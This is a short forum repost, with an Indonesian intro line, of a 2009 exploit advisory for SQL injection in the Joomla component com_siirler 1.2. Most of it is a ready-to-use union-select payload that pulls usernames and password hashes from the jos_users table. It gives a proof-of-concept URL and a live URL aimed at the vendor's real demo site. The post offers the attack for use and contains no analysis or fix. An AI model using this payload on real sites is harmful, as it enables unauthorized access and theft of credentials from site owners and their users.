mungkin ada yg blun liat di milworm.. jadi saya post di sini..!!!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
| |
| Joomla <= 1.5.x Component com_siirler 1.2 (sid) SQL Injection Vulnerability |
| |
| |
| =================[Author]================== |
| |
| [+] Founded : v3n0m |
| [+] Contact : v3n0m666[at]live[dot]com |
| [+] Blog : http://0wnage.wordpress.com/ |
| [+] Group : YOGYACARDERLINK |
| [+] Site : http://yogyacarderlink.web.id/ |
| [+] Date : August, 25th 2009 [INDONESIA] |
| |
| ================[Soft Info]================ |
| |
| Software: Siirler Bileseni |
| Version : 1.2 RC (Legacy) |
| Vendor : http://www.qproje.com/ |
| License : GNU/GPL |
| |
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[-] Exploit:
[+] +and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
[-] SQLi p0c:
[+] http://localhost/[path]/index.php?option=com_siirler&task=sdetay&sid=[xxx]+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
[xxx] = Valid sid number
[+] Demo Live:
[-] http://demo.qproje.com/j15x/index.php?option=com_siirler&task=sdetay&sid=364+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--